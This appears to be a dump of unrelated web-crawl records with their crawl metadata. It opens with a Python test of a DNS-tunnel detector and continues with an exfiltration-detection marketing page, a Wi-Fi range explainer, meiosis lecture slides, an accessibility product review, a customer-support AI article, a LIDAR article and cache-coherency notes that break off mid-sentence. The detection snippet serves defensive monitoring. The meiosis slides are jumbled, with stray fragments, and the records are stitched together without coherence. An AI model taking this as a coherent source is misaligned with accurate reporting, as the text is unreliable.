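# Example: hundreds of large TXT queries in one minute should trip the check.
suspect = [DnsQuery(t, "TXT", 512) for t in range(600)]
normal = [DnsQuery(t, "A", 60) for t in range(40)]
print(looks_like_dns_tunnel(suspect))   # True
print(looks_like_dns_tunnel(normal))    # False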
The security team was able to quickly identify the compromised machine and stop the data exfiltration, something they wouldn't have discovered via their log, IPS, or IDS analysis. Because of ExtraHop's autodiscovery of all L2 - L7 communication and its ability to transform wire data into well-formatted syslog messages and stream its dataset to their SIEM, the platform became part of their pervasive security monitoring strategy. They also set up all of their databases containing personally identifiable information (PII) into a device group within ExtraHop and set alerts based on client requests, size of database response, logins, and protocols in use to flag any unusual behavior that would indicate exfiltration. They have also set up deep encryption analysis to ensure that all sensitive data in flight are encrypted with the correct SSL version, key, and cipher strength. Auditing and reporting have become much simpler and more factual. ExtraHop's ability to observe all communication and transactions on the wire has added a wholly new perspective, based on continuous observation, to their security monitoring and analytics strategy.
<urn:uuid:aaeaabb2-2fbd-4aa6-ad2a-b46af26ee29d>
CC-MAIN-2017-04
https://www.extrahop.com/solutions/data-exfiltration-detection/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961645
865
2.859375
3
How Far can a Wi-Fi Signal Travel? You’ve most likely noticed that Wi-Fi signals do not travel an infinite distance. The farther a Wi-Fi signal goes, the weaker it gets. This is known as attenuation. The same thing happens to your voice. When you speak or yell, your voice will be nice and loud nearby, but your voice will get weaker (softer) the farther it travels. Exactly how far a Wi-Fi signal can travel depends on several factors: 1. The type of wireless router used: More powerful wireless routers (with more powerful antennas) are capable of transmitting a signal farther. 2. The type of 802.11 protocol used. Here are the transmission ranges (indoors): - 802.11b: 115 ft. - 802.11a: 115 ft. - 802.11g: 125 ft. - 802.11n: 230 ft. - 802.11ac: 230 ft. However, keep in mind that calculating attenuation and wireless ranges indoors can be very tricky. That’s because inside your house, the Wi-Fi signal bounces off obstacles and has to penetrate a variety of materials (like walls) that weaken the signal. What Kinds of Things Can Obstruct a Wireless Signal? Solid items can greatly attenuate (weaken) communication signals. Let’s compare this to your voice again. If you’re speaking to someone in another room, they’ll be able to hear you more clearly if the door between the two rooms is open rather than closed. Likewise, obstructions like walls and doors can dampen a wireless signal, decreasing its range. - A solid wood door will attenuate a wireless signal by 6 dB. - A concrete wall will attenuate a wireless signal by 18 dB. And each 3 dB of attenuation represents a power loss of ½! What Else Can Impact a Wireless Signal? In addition to physical obstructions like walls and doors, radio interference can also impact Wi-Fi signals. For example, various home appliances like microwave ovens, cordless phones, and wireless baby monitors can all interfere with your Wi-Fi network (you can read more about wireless interference here). In addition, if there are too many Wi-Fi networks all using the same wireless channel in the same area, the “noise” can impact your signal. Let’s return to the voice comparison. What happens when you’re trying to speak and someone else starts speaking, turns on the TV, or turns up the radio volume at the same time? It’s much harder for others to hear what you’re saying. How Can Wired/Wireless Extenders Help? If you have a big house, and you’d like to be able to communicate with someone upstairs or in a far room, you might install a home intercom system. This is similar to a wired Wi-Fi extender. These devices use the home’s existing wiring (coax for MoCA-based solutions and electrical wiring for Powerline-based solutions) to extend the wireless network into a far corner of the home. In essence, they carry the wireless signals through a wired connection (where there’s less attenuation and interference) and then send out a strong wireless signal in the new location.
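To see how quickly those decibel figures add up, here is a small illustrative Python sketch (not from the article). It converts a total attenuation in dB into the fraction of transmitted power that survives, consistent with the rule of thumb above that every 3 dB of loss halves the power.

# Illustrative sketch (not from the article): turning the attenuation figures
# above into a remaining-power fraction.

OBSTACLE_LOSS_DB = {
    "solid wood door": 6,
    "concrete wall": 18,
}

def remaining_power_fraction(total_loss_db):
    """Fraction of transmitted power left after total_loss_db of attenuation."""
    return 10 ** (-total_loss_db / 10.0)

path = ["solid wood door", "concrete wall"]
loss = sum(OBSTACLE_LOSS_DB[o] for o in path)
print(f"total loss: {loss} dB, "
      f"remaining power: {remaining_power_fraction(loss):.4%}")
# 24 dB of loss leaves roughly 0.4% of the original power, which matches the
# halving rule: 24 dB / 3 dB = 8 halvings, and 0.5**8 ~ 0.0039.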
<urn:uuid:d0fbb04c-7118-42ba-ac52-db2e74238df0>
CC-MAIN-2017-04
http://wifi.actiontec.com/learn-more/wifi-wireless-networking/how-far-can-a-wi-fi-signal-travel/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00158-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896758
700
3.40625
3
9.1 What is Meiosis and why it is important to evolution and adaptation? Meiosis (sexual) serves 2 major functions Production of gametes/spores by reducing from 2n to n the chromosome number of the species Produce genetic variation by shuffling chromosomes in the cell to produce genetically different combinations Eukaryote's chromosomes come often in pairs of homologous chromosomes (2n) Also called homologues Have the same size, shape, and construction (location of centromere) Contain the same genes for the same traits The offspring receives one member of each homologous pair from each parent Homologous pairs may contain different versions of the same gene Alleles – alternate forms of a gene Both males and females have 23 pairs of chromosomes 23 pairs or 46 total chromosomes = diploid (2n) Haploid number (n) in gametes – 23 total chromosomes 22 pairs of autosomes 1 pair of sex chromosomes XX female or XY male Figure 9.1 Homologous chromosomes homogenous autosome pair The 46 chromosomes of a male sister chromatids centromere Sex chromosomes are different lengths in males. Human life cycle Life cycle – in sexually reproducing organisms refers to all the reproductive events that occur from one generation to the next Involves both mitosis and meiosis Mitosis involved in continued growth of a child and repair of tissues throughout life Somatic (body) cells are diploid Meiosis reduces the chromosome number from diploid to haploid Gametes (egg and sperm) have only 1 member of each homologous pair Spermatogenesis produces sperm in the testes Oogenesis produces eggs in the ovaries Egg and sperm join to form diploid zygote Figure 9.2 Life cycle of humans FERTILIZATION Mitosis Mitosis 2n 2n MEIOSIS sperm n egg n 2n=46 diploid(2n) haploid (n) n=23 zygote2n 2n 9.2 The Phases of Meiosis Meiosis involves two divisions: meiosis I and meiosis II Each division is broken down into four phases: Prophase (I and II) Metaphase (I and II) Anaphase (I and II) Telophase (I and II) Results in 4 daughter cells 2 divisions Meiosis I Homologous pairs line up during synapsis resulting in tetrad Homologous chromosomes of each pair then separate Meiosis II No duplication of chromosomes Chromosomes are dyads – composed of 2 sister chromatids Sister chromatids are separated 2 daughter nuclei separate Figure 9.3 Overview of meiosis Chromosome duplication Meiosis II n=2 n=2 n=2 n=2 Meiosis II dyad Meiosis I Chromosome duplication 2n=4 sister chromatids centromere tetrad prophase I Figure 9.6 Meiosis I Meiosis I: Homologous chromosomes separate nuclear envelope fragment Prophase I Metaphase I Anaphase I Telophase I sister chromatids Prophase I Tetrads form, and crossing-over occurs as chromosomes condense; the nuclear envelope fragments. Metaphase I Tetrads align at the spindle equator. Either homologue can face either pole. Anaphase I Homologues separate, and dyads move to poles. Telophase I Daughter nuclei are haploid ,having received one duplicated chromosome from each homologous pair.
n=2 centromere 2n=4 crossing-over spindle forming chromosome attached to a spindle fiber crossing over chromosomes still duplicated cleavage furrow tetrad Figure 9.4 Prophase I spindle poles tetrad During prophase I, replicated homologous chromosomes pair up and form a tetrad, a process called synapsis Each tetrad consists of 2 duplicated chromosomes (dyads), with each chromosome containing 2 sister chromatids, for a total of 4 chromatids Dyad Two sister chromatids Figure 9.5 Crossing-over chromosomes in four different gametes chromatids after exchange crossing-over between nonsister chromatids synapsis nonsister chromatids Crossing-over When a tetrad forms during synapsis, chromatids from homologous chromosomes (nonsister chromatids) may exchange genetic material Increases variability of the gametes and, therefore, the offspring The importance of meiosis Chromosome number stays constant in each new generation Generates diversity Crossing-over All possible combinations of haploid number of chromosomes Fertilization produces new combinations (2)n (2)3 chromosomally different zygotes without crossing-over (2)n=(2)3=8 Figure 9.7 Meiosis II Prophase II Chromosomes condense, and the nuclear envelope fragments. Metaphase II Tetrads align at the spindle equator. Anaphase II Sister chromatids separate ,becoming daughter chromosomes that move to the poles. n=2 Telophase II haploid daughter cells forming sister chromatids separate Telophase II Four haploid daughter cells are genetically different from each other and from the parent cell. Prophase II Metaphase II Anaphase II Meiosis II: Sister chromatids separate 9.3 Meiosis Compared with Mitosis Meiosis requires two nuclear divisions, but mitosis requires only one nuclear division Meiosis produces four daughter nuclei, and there are four daughter cells following cytokinesis; mitosis followed by cytokinesis results in two daughter cells Following meiosis, the four daughter cells are haploid and have half the chromosome number as the parent cell; following mitosis, the daughter cells have the same chromosome number as the parent cell Following meiosis, the daughter cells are genetically dissimilar to each other and to the parent cell; following mitosis, the daughter cells are genetically identical to each other and to the parent cell Figure 9.8 Meiosis compared with mitosis Meiosis Mitosis Daughter chromosomes have separated. Haploid daughter nuclei are not genetically identical to parent cell. Diploid daughter nuclei are genetically identical to parent cell. Daughter cells have formed. Daughter cells have formed. Homologues separate. Daughter chromosomes separate. Tetrads are at spindle equator. Dyads are at spindle equator. Synapsis and crossing-over occur. Meiosis occurs only at certain times of the life cycle of sexually reproducing organisms and only in specialized tissues Mitosis is much more common Occurs in all tissues during embryonic growth Also occurs during growth and repair 92 92 46 Chromosomes Chromatids Chromosomes Chromatids Number of Chromosomes and Number of Chromatids after DNA replication (duplication) 9.4 Abnormal Chromosome Inheritance Nondisjunction Meiosis I when both members of a pair go into the same daughter cell Meiosis II when sister chromatids fail to separate Trisomy – 3 copies of a chromosome Monosomy – single copy of a chromosome Figure 9.9a Nondisjunction during meiosis Meiosis II Meiosis I pair of homologous chromosomes non disjunction Gamete will have one less chromosome. Gamete will have one extra chromosome. 
Non disjunction during meiosis I (2n-1) (2n+1) Meiosis II Meiosis I normal meiosis I non disjunction pair of homologous chromosomes Gamete will have either one less or one extra chromosome. normal meiosis II Gamete will have normal number of chromosomes. Non disjunction during meiosis II Figure 9.10 Down syndrome Bella, 3 yo Photo: 2012 Santorum, 53 yo Garver, 52 yo Autosomal trisomy 18 (Edwards Syndrome Abnormal sex chromosome number Too few or too many X or Y chromosomes Newborns with abnormal sex chromosome numbers are more likely to survive than those with abnormal autosome numbers Extra X chromosomes become Barr bodies – inactivated Y determines maleness SRY (sex-determining region Y) gene on Y chromosome Turner syndrome (45, XO) Absence of second sex chromosome Female Klinefelter syndrome (47, XXY) Extra X inactivated as Barr body Male Figure 9.11 Abnormal sex chromosome number no facial hair some breast development very long arms less-developed testes very long legs a. A female with Turner (XO) syndrome b. A male with Klinefelter (XXY) syndrome webbed neck less-developed breasts less-developed ovaries
<urn:uuid:3c96ed67-8018-42b7-9207-edc73fc84141>
CC-MAIN-2017-04
https://docs.com/britzeida-rodriguez/9242/ess-ch9-meiosis-1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00158-ip-10-171-10-70.ec2.internal.warc.gz
en
0.857849
1,971
3.484375
3
Enterprises and organisations of all shapes and sizes must be able to communicate effectively with their clients to survive. Technology, in particular the web, has greatly increased the number of options available for such communications. Very nearly as a by-product the web has improved the ability of organisations to communicate with people with disabilities. People with vision impairments can now read electronic documents that used to only be available in inaccessible printed format. People with mobility problems can now get all the information delivered to their desk rather than having to go to the organisation to be provided with the information. People with hearing impairments can now read information rather than having to discuss it with someone who was unable to communicate with them with sign language. However, the web is not the right solution for all levels of communication. There are times when communicating directly with another human being is what is really needed: - complex product selection where a series of questions and answers is the only way to get to the correct solution. - problem diagnosis and resolution. - assistance with the use of some product or process. The telephone connected to a call centre is the typical way of resolving this sort of issue. It is a convenient and accessible solution for most people including most people with disabilities. However, people with hearing impairments, or speech impediments, are excluded from this sort or help. E-mail and SMS can provide a partial solution but they cannot be considered equivalent to, or as effective as, a telephone connection. A videophone link with an operator who can sign might be considered the ideal solution. But in reality the lack of the requisite technology and operators who can sign means that this is only practical in very specialised circumstances. It also does not meet the needs of hard of hearing people who do not use sign language and find text the most accessible medium. The textphone, also known as Minicom, has been the standard solution in Europe and in America they use TTY. These technologies provide a character-by-character synchronous communication, which means that when a user types a character at one end it is immediately visible at the other. This gives a much more natural flow of communication without the inevitable delays inherent in technologies such as SMS and instant messaging. It even allows the recipient to interrupt by typing at the same time as they are still receiving a message. Thus providing a text equivalent of a telephone conversation. The textphone solution has been around for a long time and has been showing its age. It uses specialised technology at both ends, runs over a very slow telecommunication channels, is not mobile and is clunky to use in comparison to PCs and mobile phones. The Royal National Institute for Deaf and Hard of Hearing People (RNID) in the UK has created an updated version of the solution called TalkByText, that replaces the specialised hardware with programs that run on PCs, the Web, or mobile phones. TalkByText uses Text over IP (ToIP) to enable the text to flow over the same IP network as data, voice and video. It comes in four different editions. The Business Edition allows any PC user in an enterprise to contact any textphone or TalkByText user, either internally in the organisation or externally. It uses the latest IP networks for communications, and is controlled by a central server in the organisation. 
The server converts from IP to the older textphone networks when necessary. The Web Edition provides a browser interface. This can be useful for a deaf person when they are travelling as they can use it from any Internet cafe or similar environment. It is also useful for the occasional user, such as myself, who needs to be able to contact a deaf relative, friend or business acquaintance. It can also be used by people living abroad as they can register with RNID and then use the web to communicate with users in the UK. The only limitation is that the user can only initiate calls but cannot receive incoming calls. The Mobile Edition runs on mobile phones such as the Nokia 9500. This complements the already heavy use of SMS by many deaf people; and enables them to have a bi-directional synchronised mobile conversation when appropriate. The latest addition to the TalkByText family is the Home Edition. This is a small PC application that provides greater functionality than the Web Edition; in particular an integrated address book and the ability to receive calls. This solution can be used to replace the textphone hardware. As it uses the Internet, calls to other Home, or Business, Edition users are free. I believe the TalkByText should be installed in every significant organisation. It is not complex or expensive and will enable anyone inside the organisation to carry on a normal business conversation with anyone who can benefit from using a textphone solution. I also think that organisations should consider including a portal to their TalkBy Text Business Edition in the website. This would enable the user to contact the organisation immediately if they required some assistance related to their current web visit. Any organisation providing such an integrated approach would show great respect for their deaf and speech impaired users; this should reflect their corporate social responsibility to reach out to their full potential user community. Whenever I look at technology specially developed for people with disabilities I asked the question "has this got a wider application?"; in this case I feel sure that some instant message users would appreciate the greater immediacy of TalkByText. So I think that providers of instant messaging technology should integrate the basic technology into their offerings. The Voice Over IP providers might also interested in integrating this into their solution; it could bring in a new cohort of users and provide some additional functionality to the existing users. This service might just support connection between two Voice Over IP users but ideally it would include break-out server to enable VoIP to older technologies. The other extension of the technology is outside the UK; I understand that the RNID is actively working with their sister organisations around the world to help them develop similar solutions in their countries.
<urn:uuid:c15b6a33-61b1-4647-b6e6-343a5becfb2c>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/talkbytext-a-telephone-call-for-people-with-hearing-or-spee/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00517-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955693
1,209
2.984375
3
We are getting smarter as a species by how much and how fast we consume content. Historically we have seen a continuous evolution of how we learn, how much we know, and how many of us know it. There is a natural hierarchy, from beginners who are still learning to read, to researchers and searchers of the web. – This hierarchy is directly impacting the level of world literacy because of the advancements in mode of information transportation and amount of content consumed. We can track this evidence historically through the types of technology offered. How technology changed the way we consumed information For example, 2500 years ago the Greeks became the second literate culture. By the 1400s our friend Johannes Gutenberg invented the printing press and the world change the way it acquired knowledge forever. At that time about 30 percent of European Adults were literate. It became the first technology disrupter to make it easy for groups of people to exchange ideas, indepently and collectively. Before, it was limited to a small percent of people who used scrolls, art, and song to gain knowledge. The printing press dramatically propelled the masses from being doers to thinkers. By 1680ac, 33 million people could read and by the 1800s the momentum brought us to 55 million. No longer was the wealth of information meant for the privileged class but for all. We were getting smarter! After the printing press our advancements grew dramatically. At the signing of the U.S. Constitution in 1787, nearly 60 percent of 3 million American adults could read but in the following 19th and 20th centuries, literacy rates in America grew rapidly. By 1870, almost 80 percent of 38.5 million Americans were literate and by 1940, almost 95 percent of 131 million citizens could read. Today, Technology continues to develop our ability to learn and exchange information. We are faster at it than ever before, and latest studies show the evidence. In 2008, UNESCO reported that 98 percent of American adults could read. Nearly 294 million Americans of about 300 million are literate and most children can read by the time they’re six or seven. According to the Census Bureau, 25-34 year-olds are now the best educated group of Americans: nearly 58 percent have some college education, and almost 27 percent have a bachelor’s degree or more. Globally we are clearly getting smarter and you can see the evidence in all regions of the world over the last century. See Figures 1 and 2. So why should this matter, why should I care? Since the invention of the internet we have seen the world’s ability to know more skyrocket. We are learning and sharing ideas faster than ever. In 2000 there were more than 300 million people using the internet by 2010 that number soared to an astonishing 1.9 billion people. How the internet is affecting the demand to know more now We are intellectually growing as a species faster than any other time in human history and it’s because of the internet. In nearly 20 years we went from less than 1% connected to the web, to 40% of the world’s population searching Google and other search engines. The number of internet users increased tenfold from 1999 to 2013. The first billion was reached in 2005. The second billion in 2010 and the third billion will be reached in 2014. That’s 3 billion people all connected, all sharing ideas. And to give you a some context to how staggering this number is there is about 7 billion people on earth. What we have accomplished in 20 years is amazing. 
But it’s not just the mode of transportation that’s creating this instant need. There are other factors that are reducing amount of content needed while decreasing the expectation of how much information we should read. Social networking sites like Facebook, Twitter, Youtube, and more are changing our habits and creating a new demand for faster understandings. How social networks created the “Now” factor Along with social networks, going mobile catapulted the next wave of how we consume information. It turned people’s “faster” need, into the “now” need. When we reduced screen size we lost the ability to offer hundreds of lines of text to read. At first we reinvented the structure of paragraphs and made our U.I’s more image centric but the demand for instant answers was not being answered. How much content do people read on a page? On the average Web page, users read at most 28% of the words during a website visit, yet we expect them to know 100%. People rarely read Web pages word by word; instead, they scan the page, picking out individual words and sentences. As a result, web pages have to employ scannable text, using highlighted keywords, meaningful sub-headings, and bulleted lists of one idea per paragraph. What we have found is most users will skip over any additional ideas if they are not caught by the first few words in the paragraph. With less content being read, more people want instant answers. For those with heavy pages of content, products, and services- usability is more difficult. We see this evidence from the growing trend of people using search bars or asking customer support centers for what they want, expecting an instant exact answer. Why the common CRM is no longer effective To act as a solution people have reinvented the customer support model to fit online. There are hundreds of companies who focus on using people to deliver answers to their community with online tools. But the reality is there is far more information then there are people, and that is why these companies who use CRM platforms have such high ticket traffic. We are asking both agents and the customers to use the same search technology to find answers in the content. Each day a new customer and the same agents answer the same questions, over and over again. Each time a company creates new content, products, or services more redundant unanswered questions come, and the more demand is pressured on customer support. So what is the solution? As we said in the beginning, those who stay ahead of the information exchange and use innovating technology to make it easier for people to get answers will win. This is why technology like Artificial Intelligence is picking up steam because it’s answering this fundamental pain – Why should people be forced to read large amounts of content if all they have to do is ask a question? All of those sci-fi movies where people talk to computers is happening. We all want to read less, but know more. This is where new companies are breaking ground in A.I., semantic search, and interactive information exchange. Companies like Inbenta are focused on using A.I. technology like our advanced Semantic Search engine to answer people’s questions before the contact support. This technology focuses on how people use Natural Language, or the way we commonly talk and ask questions to each other. For Inbenta, we want to create a similar exchange with machines the same way we do with each other. 
With this type of technology, companies that run e-commerce websites will change the way customer support is done. This new customer support model helps companies embrace an “Answers First, Customer Support Second” system. There is less work done by the customer support team and more work done by a machine that interacts with people in a natural, genuine way. Offering technology that can find the right answers before humans do will change the rate of information exchange from 24 hours to instant. Connecting tools like Avatars and Virtual Assistants to a Semantic Search engine and Self Service tools will provide an intelligent, intuitive, and interactive experience that is personal and immediate in its responses. We have come a long way in how we digest content and create new ideas. We will continue to advance how we interact with people and how this interaction affects the way we make choices. People will get to experience more while having to read less. For companies that conduct business, it means less time explaining in paragraphs and more focus on building interactive relationships that grow their businesses and their communities and provide instant results.
<urn:uuid:e3b3916d-aa0e-40b5-9cc8-b3efb68c6668>
CC-MAIN-2017-04
https://www.inbenta.com/en/blog/the-evolution-of-content-delivery-is-changing-the-way-people-and-customer-support-work-together/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00333-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953543
1,661
2.984375
3
How LIDAR is revolutionizing maps, geospatial data First of four parts. It's faster than a speeding bullet. It can measure buildings in a single pulse. It can scan the ocean floor and peer through forest canopies to measure undergrowth. It's LIDAR – light detection and ranging. A standard LIDAR system emits a beam of light from a laser source and then captures the returned light in sensors as it bounces back from a reflecting object, measuring the distance by calculating the time required for the round trip. While LIDAR systems were used by the federal government as early as the 1960s — primarily for atmospheric studies — it wasn't until after 2000 that a combination of factors resulted in a boom of LIDAR data-gathering projects that are now bearing fruit at federal, state and local government levels. U.S. troops have used LIDAR to map the difficult terrain in Afghanistan and a Colorado State University scientist used it in creating the first forest height map to measure carbon cycles in ecosystems. "It's being used by just about everybody who uses a map," said John English, LIDAR data coordinator for Oregon's Department of Geology. "Every municipality and county is using it. The Department of Land Management and the U.S. Forest Service use it for their forest inventory surveys." According to English, the agencies are increasingly turning to LIDAR because the technology has gotten both less expensive and more accurate, and, because surveys are generally done from aircraft, vast amounts of territory can be covered quickly. "It's been a huge timesaver," he said. "The estimate of savings is incalculable." Kirk Waters, a program manager at the National Oceanic and Atmospheric Administration's Coastal Services Center, agrees. "LIDAR is a way to get fairly accurate elevations over a broad area at a reasonable price," he said. Waters pointed to a March 2012 report by the U.S. Geological Survey that found that a national program of collecting LIDAR data would result in net benefits of between $116 million and $620 million a year. According to the study — the National Enhanced Elevation Assessment — the biggest savings are to be realized in flood risk management, infrastructure and construction management, natural resources conservation, agriculture and water supply management. Elevation data can tell city planners where to plan mitigation for floods. It can tell farmers where to expect irrigation runoff and where to plant crops that require the most expensive fertilizers. Cities are using LIDAR to build 3D maps. In all, "the study came up with 600 different uses,” Waters said. “There's just tons of applications." "It's at the beginning stages," said Steve Snow, a mapping and LIDAR specialist with geospatial tech company Esri. "Everybody is learning about the technology." Esri, in fact, just added the ability to import native LIDAR directly into its industry-standard ArcGIS software. In principle, the technology behind LIDAR is simple. By measuring the time it takes light to bounce off an object, and knowing the speed of light (186,000 miles per second), one can detect the distance of the object. The challenge has been in developing equipment that can fire rapid pulses of light — in some cases up to 150,000 pulses per second — and that can measure the returning light with accuracy. LIDAR systems vary in the wavelengths of light and the power of the pulses employed. 
High-energy pulse systems, for example, typically are used for atmospheric research, while lower-powered micropulse systems are more often employed for downward scanning, since they are considered "eye safe." And although most airborne LIDAR systems use 1064-nanometer laser beams, bathymetric LIDAR systems — those used to penetrate water — employ a narrower 532-nm beam. Bathymetric LIDAR also transmits two light waves, one infrared and the other green. As a result, it can detect two returning signals, one off the water surface and the other from the seabed. Other critical elements in the development of LIDAR systems have been the enhancements in the production of higher-resolution and more flexible scanners, optics and photoreceptors. Finally, collecting LIDAR data from aircraft involves a few additional challenges. Because the LIDAR sensor is moving, the changes in location between the firing of the pulse of light and its return must be accounted for in making any measurement. That required the development of fast, high-resolution GPS devices and inertial measurement units that measure velocity and orientation. Coordinating of this, of course, is no mean feat, nor is digesting the massive amounts of data that are produced. According to Waters, NOAA's LIDAR scans are shooting between 100,000 and 200,000 points per second with about up to 10cm of error. "The rest is math," Waters said. "Lots of math, but it's still just math." NEXT: LIDAR proves its worth in the floodplains of the Red River Basin and the Forests of Oregon
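The underlying arithmetic is easy to sketch. The following short Python example is an illustration only, not code from any LIDAR vendor: it converts a round-trip pulse time into a range and shows how little time separates pulses at the 150,000-pulses-per-second rates mentioned above.

# Illustrative sketch (not from the article): the round-trip timing math
# behind a LIDAR range measurement.

SPEED_OF_LIGHT_M_S = 299_792_458  # metres per second

def range_from_round_trip(seconds):
    """Distance to the reflecting surface from a round-trip pulse time."""
    return SPEED_OF_LIGHT_M_S * seconds / 2.0

# A return received 2 microseconds after the pulse left the aircraft
# corresponds to a surface roughly 300 m away.
print(f"{range_from_round_trip(2e-6):.1f} m")

# At 150,000 pulses per second the pulse interval is only ~6.7 microseconds,
# which is why fast sensors, precise GPS/IMU data, and plenty of math are needed.
print(f"pulse interval: {1 / 150_000 * 1e6:.1f} microseconds")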
<urn:uuid:e5d49b65-7c06-457d-962e-94435b9d6420>
CC-MAIN-2017-04
https://gcn.com/Articles/2013/03/12/LIDAR-revolutionizing-maps-geospatial-data.aspx?s=BIGDATA_100413&admgarea=TC_BigData&Page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00151-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951062
1,066
3.421875
3
A multiprocessor and a multicomputer each comprise a number of independent processors connected by a communications medium, either a bus or more advanced switching system, such as a crossbar switch. We focus this discussion on multiprocessors, which use a common main memory as the primary means for inter–processor communication. Later, we shall see that many of the same issues appear for multicomputers, which are more loosely coupled. Logically speaking, it would be better to do without cache memory. Such a solution would completely avoid the problems of cache coherency and stale data. Unfortunately, such a solution would place a severe burden on the communications medium, thereby limiting the number of independent processors in the system. This lecture will focus on a common bus as a communications medium, but only because a bus is easier to draw. The same issues apply to other switching systems. Topics for today: 1. The cache write problem for uniprocessors and multiprocessors. 2. A simple cache coherency protocol. 3. The industry standard MESI protocol. The Cache Write Problem Almost all problems with cache memory arise from the fact that the processors write data to the caches. This is a necessary requirement for a stored program computer. The problem in uniprocessors is quite simple. If the cache is updated, the main memory must be updated at some point so that the changes can be made permanent if needed. Here is a simple depiction of a uniprocessor with a cache. As always, this could be (and often is) elaborated significantly in order to achieve better performance. It was in this context that we first met the issue of cache write strategies. We focused on two strategies: write–through and write–back. In the write–through strategy, all changes to the cache memory were immediately copied to the main memory. In this simpler strategy, memory writes could be slow. In the write–back strategy, changes to the cache were not propagated back to the main memory until necessary in order to save the data. This is more complex, but faster. The Cache Write Problem (Part 2) The uniprocessor issue continues to apply, but here we face a bigger problem. The coherency problem arises from the fact that the same block of the shared main memory may be resident in two or more of the independent caches. There is no problem with reading shared data. As soon as one processor writes to a cache block that is found in another processor’s cache, the possibility of a problem arises. Cache Coherency: Introductory Comments We first note that this problem is not unique to parallel processing systems. Those students who have experience with database design will note the strong resemblance to the “lost update” problem. Those with experience in operating system design might find a hint of the theoretical problem called “readers and writers”. It is all the same problem: handling the problem of inconsistent and stale data. The cache coherency problems and strategies for solution are well illustrated on a two processor system. We shall consider two processors P1 and P2, each with a cache. Access to a cache by a processor involves one of two processes: read and write. Each process can have two results: a cache hit or a cache miss. Recall that a cache hit occurs when the processor accesses its private cache and finds the addressed item already in the cache. Otherwise, the access is a cache miss. Read hits occur when the individual processor attempts to read a data item from its private cache and finds it there. 
There is no problem with this access, no matter how many other private caches contain the data. The problem of processor receiving stale data on a read hit, due to updates by other independent processors, is handled by the cache write protocols. Cache Coherency: The Wandering Process Problem This strange little problem was much discussed in the 1980’s (Ref. 3), and remains somewhat of an issue today. Its lesser importance now is probably due to revisions in operating systems to better assign processes to individual processors in the system. The problem arises in a time–sharing environment and is really quite simple. Suppose a dual–processor system: CPU_1 with cache C_1 and CPU_2 with cache C_2. Suppose a process P that uses data to which it has exclusive access. Consider the following scenario: 1. The process P runs on CPU_1 and accesses its data through the cache C_1. 2. The process P exceeds its time quantum and All dirty cache lines are written back to the shared main memory. 3. After some time, the process P is assigned to CPU_2. It accesses its data through cache C_2, updating some of the data. 4. Again, the process P times out. Dirty cache lines are written back to the memory. 5. Process P is assigned to CPU_1 and attempts to access its data. The cache C_1 retains some data from the previous execution, though those data are stale. In order to avoid the problem of cache hits on stale data, the operating system must flush every cache line associated with a process that exceeds its time quota. Cache Coherency: Snoop Tags Each line in a cache is identified by a cache tag (block number), which allows the determination of the primary memory address associated with each element in the cache. Cache blocks are identified and referenced by their memory tags. In order to maintain coherency, each individual cache must monitor the traffic in cache tags, which corresponds to the blocks being read from and written to the shared primary memory. This is done by a snooping cache (or snoopy cache, after the Peanuts comic strip), which is just another port into the cache memory from the shared bus. The function of the snooping cache is to “snoop the bus”, watching for references to memory blocks that have copies in the associated data cache. Cache Coherency: A Simple Protocol We begin our consideration of a simple cache coherency protocol. After a few comments on this, we then move to consideration of the MESI protocol. In this simple protocol, each block in the cache of an individual processor can be in one of three states: 1. Invalid: the cache block does not contain valid data. 2. Shared (Read Only): the cache block contains valid data, loaded as a result of a read request. The processor has not written to it; it is “clean” in that it is not “dirty” (been changed). This cache block may be shared with other processors; it may be present in a number of individual processor caches. 3. Modified (Read/Write): the cache block contains valid data, loaded as a result of either a read or write request. The cache block is “dirty” because its individual processor has written to it. It may not be shared with other individual processors, as those other caches will contain stale data. Terminology: The word “invalid” has two uses here: 1) that a given cache block has no valid data in it; and 2) the state of a cache just prior to a cache miss. A First Look at the Simple Protocol Let’s consider transactions on the cache when the state is best labeled as “Invalid”. 
The requested block is not in the individual cache, so the only possible transitions correspond to misses, either read misses or write misses. Note that this process cannot proceed if another processor’s cache has the block labeled as “Modified”. We shall discuss the details of this case later. In a read miss, the individual processor acquires the bus and requests the block. When the block is read into the cache, it is labeled as “not dirty” and the read proceeds. In a write miss, the individual processor acquires the bus, requests the block, and then writes data to its copy in the cache. This sets the dirty bit on the cache block. Note that the processing of a write miss exactly follows the sequence that would be followed for a read miss followed by a write hit, referencing the block just read. Cache Misses: Interaction with Other Processors We have just established that, on either a read miss or a write miss, the individual processor must acquire the shared communication channel and request the block. If the requested block is not held by the cache of any other individual processor, the transition takes place as described above. We shall later add a special state to account for this possibility; that is the contribution of the MESI protocol. If the requested block is held by another cache and that copy is labeled as “Modified”, then a sequence of actions must take place: 1) the modified copy is written back to the shared primary memory, 2) the requesting processor fetches the block just written back to the shared memory, and 3) both copies are labeled as “Shared”. If the requested block is held by another cache and that copy is labeled as “Shared”, then the processing depends on the action. Processing a read miss only requires that the requesting processor fetch the block, mark it as “Shared”, and execute the read. On a write miss, the requesting processor first fetches the requested block with the protocol responding properly to the read miss. At the point, there should be no copy of the block marked “Modified”. The requesting processor marks the copy in its cache as “Modified” and sends an invalidate signal to mark all copies in other caches as stale. The protocol must insure that no more than one copy of a block is marked as “Modified”. Write Hits and Misses As we have noted above, the best way to view a write miss is to consider it as a sequence of events: first, a read miss that is properly handled, and then a write hit. This is due to the fact that the only way to handle a cache write properly is to be sure that the affected block has been read into memory. As a result of this two–step procedure for a write miss, we may propose a uniform approach that is based on proper handling of write hits. At the beginning of the process, it 